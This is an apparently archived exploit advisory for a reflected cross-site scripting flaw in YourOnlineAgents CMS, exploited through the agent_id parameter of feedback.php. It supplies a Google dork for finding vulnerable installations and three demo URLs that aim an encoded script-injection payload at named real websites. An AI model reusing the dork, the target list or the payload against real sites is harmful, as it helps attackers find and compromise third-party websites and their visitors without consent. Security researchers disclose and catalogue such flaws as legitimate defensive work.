YourOnlineAgents CMS suffers from a cross site scripting vulnerability. Note that this finding houses site-specific data.
08c47bd484b067291df87dd30298341a33104a747b55afc101b3888cdada0f17# Exploit Title: YourOnlineAgents cms Cross Site Scripting
# Google Dork:intext :Powered By YourOnlineAgents.com
# Date: 08/7/2012
# Author: Crim3R
# Cms Creator home : http://www.youronlineagents.com/
# Version: -
# Tested on: all
========================================
In feedback.php file set agent_id to your html Code
D3M0 :
http://www.walstenmarine.com/feedback.php?agent_id=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
http://www.century21granite.com/feedback.php?agent_id=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
http://www.cbn.on.ca/feedback.php?agent_id=%22%3E%3Cscript%3Ealert(0);%3C/script%3E
===============Crim3R@Att.Net===========
$home = http://Secure-Land.net
thanks to : 2MzRp - Mikili - Amir - 0x0ptim0us - iC0d3R - farbodmahini
and all Secure-land & IrIsT Members ...
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed